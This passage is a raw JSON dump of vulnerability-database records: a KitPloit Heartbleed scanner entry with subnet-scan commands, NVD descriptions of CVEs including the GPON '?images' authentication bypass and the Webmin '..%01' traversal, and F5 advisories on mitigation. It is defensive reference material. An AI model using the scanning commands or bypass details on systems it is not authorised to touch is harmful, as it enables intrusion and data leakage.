\n\n \n \n python heartbleedscan.py -n 192.168.1.0/24 -f localscan.txt -r\n\n \nTo scan the same network against SMTP Over SSL/TLS and randomize the IP addresses \n\n \n \n python heartbleedscan.py -n 192.168.1.0/24 -p 25 -s SMTP -r\n\n \nIf you already have a target list which you created by using nmap/zmap \n\n \n \n python heartbleedscan.py -i targetlist.txt\n\n \n** Dependencies ** \n** \n** Before using Heartbleed Vulnerability Scanner, you should install ** python-netaddr ** package. \n \nCentOS or CentOS-like systems : \n\n \n \n yum install python-netaddr\n\n \nUbuntu or Debian-like systems : \n\n \n \n apt-get insall python-netaddr\n\n \n \n\n\n** [ Download Heartbleed Vulnerability Scanner ](<https://github.com/hybridus/heartbleedscanner>) **\n", "modified": "2015-10-01T09:47:01", "published": "2015-10-01T09:47:01", "id": "KITPLOIT:7942195329946074809", "href": "http://www.kitploit.com/2015/10/heartbleed-vulnerability-scanner.html", "title": "Heartbleed Vulnerability Scanner - Network Scanner for OpenSSL Memory Leak (CVE-2014-0160)", "type": "kitploit", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "cve": [{"lastseen": "2019-05-29T18:19:41", "bulletinFamily": "NVD", "description": "An issue was discovered on Dasan GPON home routers. It is possible to bypass authentication simply by appending \"?images\" to any URL of the device that requires authentication, as demonstrated by the /menu.html?images/ or /GponForm/diag_FORM?images/ URI. One can then manage the device.", "modified": "2019-03-04T18:39:00", "id": "CVE-2018-10561", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-10561", "published": "2018-05-04T03:29:00", "title": "CVE-2018-10561", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:08:33", "bulletinFamily": "NVD", "description": "Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML, which allows remote attackers to read arbitrary files, as demonstrated using \"..%01\" sequences, which bypass the removal of \"../\" sequences before bytes such as \"%01\" are removed from the filename. NOTE: This is a different issue than CVE-2006-3274.", "modified": "2018-10-18T16:47:00", "id": "CVE-2006-3392", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3392", "published": "2006-07-06T20:05:00", "title": "CVE-2006-3392", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:10:00", "bulletinFamily": "NVD", "description": "HP Operations Manager 8.10 on Windows contains a \"hidden account\" in the XML file that specifies Tomcat users, which allows remote attackers to conduct unrestricted file upload attacks, and thereby execute arbitrary code, by using the org.apache.catalina.manager.HTMLManagerServlet class to make requests to manager/html/upload.", "modified": "2017-08-17T01:31:00", "id": "CVE-2009-3843", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3843", "published": "2009-11-24T00:30:00", "title": "CVE-2009-3843", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T11:53:46", "bulletinFamily": "NVD", "description": "The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to Remote Code Execution when deserializing XML payloads.", "modified": "2019-08-12T21:15:00", "id": "CVE-2017-9805", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-9805", "published": "2017-09-15T19:29:00", "title": "CVE-2017-9805", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-03T13:01:37", "bulletinFamily": "NVD", "description": "The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.", "modified": "2018-03-04T02:29:00", "id": "CVE-2017-5638", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5638", "published": "2017-03-11T02:59:00", "title": "CVE-2017-5638", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:20:29", "bulletinFamily": "NVD", "description": "Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.", "modified": "2019-03-01T18:04:00", "id": "CVE-2018-7600", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-7600", "published": "2018-03-29T07:29:00", "title": "CVE-2018-7600", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-10-10T12:13:50", "bulletinFamily": "NVD", "description": "GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka \"ShellShock.\" NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.", "modified": "2019-10-09T23:11:00", "id": "CVE-2014-6271", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271", "published": "2014-09-24T18:48:00", "title": "CVE-2014-6271", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-02-14T14:30:26", "bulletinFamily": "NVD", "description": "The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.\nCVSS V2 scoring evaluates the impact of the vulnerability on the host where the vulnerability is located. When evaluating the impact of this vulnerability to your organization, take into account the nature of the data that is being protected and act according to your organization\u2019s risk acceptance. While CVE-2014-0160 does not allow unrestricted access to memory on the targeted host, a successful exploit does leak information from memory locations which have the potential to contain particularly sensitive information, e.g., cryptographic keys and passwords. Theft of this information could enable other attacks on the information system, the impact of which would depend on the sensitivity of the data and functions of that system.", "modified": "2019-10-09T23:09:00", "id": "CVE-2014-0160", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160", "published": "2014-04-07T22:55:00", "title": "CVE-2014-0160", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "f5": [{"lastseen": "2019-09-26T22:28:10", "bulletinFamily": "software", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability, and no F5 products were found to be vulnerable.\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of AskF5 Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "modified": "2018-03-29T18:25:00", "published": "2018-03-29T18:25:00", "id": "F5:K22854260", "href": "https://support.f5.com/csp/article/K22854260", "title": "Drupal vulnerability CVE-2018-7600", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-06T22:39:58", "bulletinFamily": "software", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | Not vulnerable | None \nBIG-IP AAM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | Not vulnerable | None \nBIG-IP AFM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | Not vulnerable | None \nBIG-IP Analytics | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | Not vulnerable | None \nBIG-IP APM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | Not vulnerable | None \nBIG-IP ASM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | Not vulnerable | None \nBIG-IP DNS | None | 13.0.0 \n12.0.0 - 12.1.2 | Not vulnerable | None \nBIG-IP Edge Gateway | None | 11.2.1 | Not vulnerable | None \nBIG-IP GTM | None | 11.4.0 - 11.6.1 \n11.2.1 | Not vulnerable | None \nBIG-IP Link Controller | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | Not vulnerable | None \nBIG-IP PEM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | Not vulnerable | None \nBIG-IP PSM | None | 11.4.0 - 11.4.1 \n11.2.1 | Not vulnerable | None \nBIG-IP WebAccelerator | None | 11.2.1 | Not vulnerable | None \nBIG-IP WebSafe | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 | Not vulnerable | None \nARX | None | 6.2.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | None | 3.1.1 | Not vulnerable | None \nBIG-IQ Cloud | None | 4.4.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Device | None | 4.4.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Security | None | 4.4.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ ADC | None | 4.5.0 | Not vulnerable | None \nBIG-IQ Centralized Management | None | 5.0.0 - 5.3.0 \n4.6.0 | Not vulnerable | None \nBIG-IQ Cloud and Orchestration | None | 1.0.0 | Not vulnerable | None \nF5 iWorkflow | None | 2.0.0 - 2.2.0 | Not vulnerable | None \nLineRate | None | 2.5.0 - 2.6.2 | Not vulnerable | None \nTraffix SDC | None | 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0 | Not vulnerable | None\n\nMitigating the Apache vulnerability using BIG-IP ASM attack signatures\n\n**Impact of action**: Performing the following action should not have a negative impact on your system.\n\nThe BIG-IP ASM system offers zero-day protection for any Apache servers affected by this vulnerability through ASM Signatures 200003440 and 200004174.\n\nFor more information, refer to the following resources:\n\n * [Apache Struts 2 REST plugin Remote Code Execution (CVE-2017-9805)](<https://devcentral.f5.com/articles/apache-struts-2-rest-plugin-remote-code-execution-cve-2017-9805-27714>)\n\n**Note**: A DevCentral login is required to access this content.\n\n * <https://cwiki.apache.org/confluence/display/WW/S2-052>\n\n**Note**: The previous link takes you to a resource outside of AskF5. The third-party could remove the document without our knowledge.\n\n * [K8217: Managing BIG-IP ASM attack signatures](<https://support.f5.com/csp/article/K8217>)\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "modified": "2018-08-28T21:20:00", "published": "2017-09-07T00:20:00", "id": "F5:K84144321", "href": "https://support.f5.com/csp/article/K84144321", "title": "Apache Struts vulnerability CVE-2017-9805", "type": "f5", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-06T22:39:36", "bulletinFamily": "software", "description": "\nF5 Product Development has assigned ID 456033 (BIG-IP), ID 456302 (BIG-IP Edge Client for Windows, Mac OS, and Linux), ID 456345 (BIG-IP Edge Client for Apple iOS), and ID 468659 (Enterprise Manager) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H456276 on the **Diagnostics** &gt; **Identified** &gt; **High** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Vulnerable component or feature \n---|---|---|--- \nBIG-IP LTM | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.0.0 - 11.4.1 \n10.0.0 - 10.2.4 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP AAM | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.4.0 - 11.4.1 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP AFM | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.3.0 - 11.4.1 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP Analytics | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.0.0 - 11.4.1 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP APM | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.0.0 - 11.4.1 \n10.1.0 - 10.2.4 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP ASM | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.0.0 - 11.4.1 \n10.0.0 - 10.2.4 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP Edge Gateway | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | None \nBIG-IP GTM | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.0.0 - 11.4.1 \n10.0.0 - 10.2.4 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP Link Controller | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.0.0 - 11.4.1 \n10.0.0 - 10.2.4 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP PEM | 11.5.0 - 11.5.1 | 11.3.0 - 11.4.1 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP PSM | None | 11.0.0 - 11.4.1 \n10.0.0 - 10.2.4 | None \nBIG-IP WebAccelerator | None | 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4 | None \nBIG-IP WOM | None | 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4 | None \nARX | None | 6.0.0 - 6.4.0 | None \nEnterprise Manager | 3.1.1 HF1 - HF2 | 3.0.0 - 3.1.1 \n2.1.0 - 2.3.0 | big3d \nFirePass | None | 7.0.0 \n6.0.0 - 6.1.0 | None \nBIG-IQ Cloud | None | 4.0.0 - 4.3.0 | None \nBIG-IQ Device | None | 4.2.0 - 4.3.0 | None \nBIG-IQ Security | None | 4.0.0 - 4.3.0 | None \nFirePass Clients | None | 5520-6032 | None \nBIG-IP Edge Portal for iOS | None | 1.0.0 - 1.0.3 | None \nBIG-IP Edge Portal for Android | None | 1.0.0 - 1.0.2 | None \nBIG-IP Edge Clients for Android | None | 2.0.3 - 2.0.4 | None \nBIG-IP Edge Clients for Apple iOS | 2.0.0 - 2.0.1 \n1.0.5 - 1.0.6 | 2.0.2 \n1.0.0 - 1.0.4 | VPN \nBIG-IP Edge Clients for Linux | 7080.* - 7080.2014.408.* \n7090.* - 7090.2014.407.* \n7091.* - 7091.2014.408.* \n7100.* - 7100.2014.408.* \n7101.* - 7101.2014.407.* | 6035 - 7071 \n7080.2014.409.* \n7090.2014.408.* \n7091.2014.409.* \n7100.2014.409.* (11.5.0 HF3) \n7101.2014.408.* (11.5.1 HF2) | VPN \nBIG-IP Edge Clients for MAC OS X | 7080.* - 7080.2014.408.* \n7090.* - 7090.2014.407.* \n7091.* - 7091.2014.408.* \n7100.* - 7100.2014.408.* \n7101.* - 7101.2014.407.* | 6035 - 7071 \n7080.2014.409.* \n7090.2014.408.* \n7091.2014.409.* \n7100.2014.409.* (11.5.0 HF3) \n7101.2014.408.* (11.5.1 HF2) | VPN \nBIG-IP Edge Clients for Windows | 7080.* - 7080.2014.408.* \n7090.* - 7090.2014.407.* \n7091.* - 7091.2014.408.* \n7100.* - 7100.2014.408.* \n7101.* - 7101.2014.407.* | 6035 - 7071 \n7080.2014.409.* \n7090.2014.408.* \n7091.2014.409.* \n7100.2014.409.* (11.5.0 HF3) \n7101.2014.408.* (11.5.1 HF2) | VPN \nLineRate | None | 2.2.0 | None \n \n**Important**: For the hotfixes noted previously, the included version of OpenSSL has not been changed. F5 has patched the existing version of OpenSSL to resolve this vulnerability. As a result, on a patched BIG-IP system, the OpenSSL version is still OpenSSL 1.0.1e-fips. For more information about installed hotfix versions, refer to [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>).\n\nBIG-IP Edge Client fixes\n\nThis issue has been fixed for BIG-IP Edge Clients for Windows, Mac OS, and Linux in BIG-IP APM 11.5.1 HF2 and 11.5.0 HF3. This issue has also been fixed for BIG-IP Edge Clients for Windows, Mac OS, and Linux in an engineering hotfix in other BIG-IP APM versions. You can obtain the engineering hotfix by contacting [F5 Technical Support](<http:// http://www.f5.com/training-support/customer-support/contact/>) and referencing this article number and the associated ID number. Note that engineering hotfixes are intended to resolve a specific software issue until a suitable minor release, maintenance release, or cumulative hotfix rollup release is available that includes the software fix. For more information, refer to [K8986: F5 software lifecycle policy](<https://support.f5.com/csp/article/K8986>).\n\nYou can eliminate this vulnerability by running a version listed in the **Versions known to be not vulnerable** column. If the **Versions known to be not vulnerable** column does not list a version that is higher than the version you are running, then no upgrade candidate currently exists.\n\nUpgrading to a version known to be not vulnerable, or taking steps to mitigate this vulnerability, does not eliminate possible damage that may have already occurred as a result of this vulnerability. After upgrading to a version that is known to be not vulnerable, consider the following components that may have been compromised by this vulnerability:\n\nSSL profile certificate/key pairs\n\nThe BIG-IP SSL profiles may reference SSL certificate/key pairs that were compromised. For information about creating new SSL certificate/key pairs for SSL profiles, refer to the following articles:\n\n * [K14620: Managing SSL certificates for BIG-IP systems using the Configuration utility](<https://support.f5.com/csp/article/K14620>)\n * [K14534: Creating SSL certificates and keys with OpenSSL (11.x - 14.x)](<https://support.f5.com/csp/article/K14534>)\n * [K13579: Generating new default certificate and key pairs for BIG-IP SSL profiles](<https://support.f5.com/csp/article/K13579>)\n\nBIG-IP device certificate/key pairs\n\nThe BIG-IP system may have a device certificate/key pair that was compromised. For information about creating new SSL certificate/key pairs, refer to the following articles:\n\n * [K9114: Creating a new SSL device certificate and key pair](<https://support.f5.com/csp/article/K9114>)\n * [K7754: Renewing self-signed device certificates](<https://support.f5.com/csp/article/K7754>)\n\n**Important**: After you generate a new device certificate and private key pair, you must re-establish device trusts. Additionally, the device certificates are used for GTM sync groups and Enterprise Manager monitoring. As a result, you must recreate the GTM sync groups and rediscover devices managed by Enterprise Manager.\n\nCMI certificate/key pairs\n\nThe BIG-IP system may have a centralized management infrastructure (CMI) certificate/key pair (used for device group communication and synchronization) that was compromised. To regenerate the CMI certificate/key pairs on devices in a device group, and rebuild the device trust, perform the following procedure:\n\n**Impact of procedure**: F5 recommends that you perform this procedure during a maintenance window. This procedure causes the current device to lose connectivity with all other BIG-IP devices. Depending on the device group and traffic group configuration, the connectivity loss may result in an unintentional active-active condition that causes a traffic disruption. To prevent a standby device from going active, set the standby device in the device group to **Force Offline** before performing the procedure. Standby devices that were set to **Force Offline** should be set to **Release Offline** after performing the procedure.\n\n 1. Log in to the Configuration utility.\n 2. Navigate to **Device Management **&gt; **Device Trust** &gt; **Local Domain**.\n 3. Click **Reset Device Trust**.\n 4. Select the **Generate new self-signed authority** option.\n 5. Click **Update** (or **Next**).\n 6. Click **Finished**.\n\nRepeat this procedure for each device in the device group.\n\nAfter you complete the device trust reset on all devices, set up the device trust by performing the procedures described in the following articles:\n\n * [K13649: Creating a device group using the Configuration utility (11.x - 12.x)](<https://support.f5.com/csp/article/K13649>)\n * [K13639: Configuring a device group using tmsh](<https://support.f5.com/csp/article/K13639>)\n * [K13946: Troubleshooting ConfigSync and device service clustering issues (11.x - 13.x)](<https://support.f5.com/csp/article/K13946>)\n\nThe big3d process\n\nThe BIG-IP system may have a vulnerable version of the** big3d **process under the following conditions:\n\n * The BIG-IP GTM system is running 11.5.0 or 11.5.1.\n * The managed BIG-IP system is running a **big3d** process that was updated by an affected BIG-IP GTM system. For example, the **big3d** process included by default on a BIG-IP LTM system running 11.4.0 is not vulnerable by itself. However, if a BIG-IP GTM system running 11.5.0 or 11.5.1 installs **big3d** 11.5.0 on the BIG-IP LTM system, the BIG-IP LTM system becomes vulnerable due to the affected **big3d **process.\n * The Enterprise Manager system is running 3.1.1 HF1 or HF2.\n * The managed BIG-IP system is running a **big3d** process that was updated by an affected Enterprise Manager system. For example, the **big3d** process included by default on a BIG-IP LTM system running 11.4.0 is not vulnerable by itself. However, if an Enterprise Manager system running 3.1.1 HF1 or HF2 installs **big3d** on the BIG-IP LTM system, the BIG-IP LTM system becomes vulnerable due to the affected **big3d **process.\n\nAffected big3d versions\n\nThe following **big3d** versions are affected by this vulnerability:\n\n * big3d version 11.5.0.0.0.221 for Linux \n * big3d version 11.5.0.1.0.227 for Linux \n * big3d version 11.5.1.0.0.110 for Linux\n\nFor information about checking the **big3d** version currently installed on the system and installing updated** big3d **versions on managed systems, refer to [K13703: Overview of big3d version management](<https://support.f5.com/csp/article/K13703>).\n\nBIG-IP maintenance and user passwords\n\nThe maintenance and user passwords used to access the BIG-IP system may have been compromised. For information about changing user passwords, refer to the following documentation:\n\n * [K13121: Changing system maintenance account passwords (11.x - 14.x)](<https://support.f5.com/csp/article/K13121>)\n * _**BIG-IP TMOS: Concepts guide**_\n\n**Note**: For information about how to locate F5 product guides, refer to [K12453464: Finding product documentation on AskF5](<https://support.f5.com/csp/article/K12453464>).\n\nMitigating this vulnerability\n\nTo mitigate this vulnerability, you should consider the following recommendations:\n\n * Consider denying access to the Configuration utility and using only the command line and** tmsh** until the BIG-IP system is updated. If that is not possible, F5 recommends that you access the Configuration utility only over a secure network.\n * If SSL profiles are configured to use COMPAT ciphers, consider reconfiguring the profiles to use ciphers from the NATIVE SSL stack. For information about the NATIVE and COMPAT ciphers, refer to the following articles: \n * [K13163: SSL ciphers supported on BIG-IP platforms (11.x - 13.x)](<https://support.f5.com/csp/article/K13163>)\n * [K13171: Configuring the cipher strength for SSL profiles (11.x)](<https://support.f5.com/csp/article/K13171>)\n * [K13187: COMPAT SSL ciphers are no longer included in standard cipher strings](<https://support.f5.com/csp/article/K13187>)\n * Virtual servers that do not use SSL profiles and pass SSL traffic through to the back-end web servers will not protect the back-end resource servers. When possible, you should protect back-end resources by using SSL profiles to terminate SSL.\n\n * <http://heartbleed.com/>\n\n**Important**: The following DevCentral article contains additional information about using iRules to assist in mitigating this vulnerability when terminating TLS traffic on back-end servers. F5 does not officially support the iRules in the following article, and information in the article does not represent a fix for the vulnerability.\n\n * [DevCentral article: OpenSSL HeartBleed, CVE-2014-0160](<http://devcentral.f5.com/articles/openssl-heartbleed-cve-2014-0160>)\n * [K14783: Overview of the Client SSL profile (11.x - 13.x)](<https://support.f5.com/csp/article/K14783>)\n * [K12463: Overview of F5 Edge products](<https://support.f5.com/csp/article/K12463>)\n * [K13757: BIG-IP Edge Client version matrix](<https://support.f5.com/csp/article/K13757>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>)\n * [K9502: BIG-IP hotfix matrix](<https://support.f5.com/csp/article/K9502>)\n * [K10322: FirePass hotfix matrix](<https://support.f5.com/csp/article/K10322>)\n", "modified": "2019-07-30T19:46:00", "published": "2015-02-17T01:30:00", "id": "F5:K15159", "href": "https://support.f5.com/csp/article/K15159", "title": "OpenSSL vulnerability CVE-2014-0160", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2017-06-08T00:16:08", "bulletinFamily": "software", "description": "\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP AAM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP ASM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP DNS| None| 13.0.0 \n12.0.0 - 12.1.2| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP Link Controller| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP PEM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1| Not vulnerable| None \nBIG-IP WebSafe| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.1.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0 - 2.1.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.2| Not vulnerable| None \nTraffix SDC| None| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\n**Protecting web servers behind the BIG-IP virtual server from CVE-2017-5638**\n\n**Impact of action**: The following example iRule may not apply to all environments. F5 recommends that you modify the iRule in the procedure as needed to work in your application environment. Additionally, adding an iRule increases the resources that the associated virtual server uses. Depending on the type and volume of the connections, this processing may introduce noticeable latency. F5 recommends that you test any such changes in an appropriate environment.\n\nYou can use an iRule to protect web servers behind the BIG-IP virtual server from CVE-2017-5638. To do so, perform the following procedures:\n\n * [Assigning a custom HTTP profile and the default stream profile to a virtual server](<https://support.f5.com/csp/article/K43451236#http_profile>)\n * [Creating an iRule and assigning it to a virtual server to protect web servers from CVE-2017-5638](<https://support.f5.com/csp/article/K43451236#iRule>)\n\n**Assigning a custom HTTP profile and the default stream profile to a virtual server**\n\n 1. Log in to the Configuration utility.\n 2. Navigate to **Local Traffic **&gt;** Profiles **&gt;** Services **&gt;** HTTP**.\n 3. Click **Create**.\n 4. In the **Name** field, type a name for the profile.\n 5. Verify that **Response Chunking** is set to **Selective,** which is the default value.\n 6. Modify any other settings, as needed, then click** Finished **to save your changes.\n 7. Navigate to **Local Traffic **&gt;** Virtual Servers** &gt; **Virtual Server List**.\n 8. Select the virtual server to modify.\n 9. In the **Configuration** box, select **Advanced**.\n 10. In the drop-down list next to **HTTP Profile**, select the new profile you created.\n 11. In the drop-down list next to **Stream Profile**, select the default **stream** profile.\n 12. Click **Update**.\n\n**Creating an iRule and assigning it to a virtual server to protect web servers from CVE-2017-5638**\n\n 1. Log in to the Configuration utility.\n 2. Navigate to **Local Traffic** &gt; **iRules**.\n 3. Click **Create**.\n 4. Type a name for the 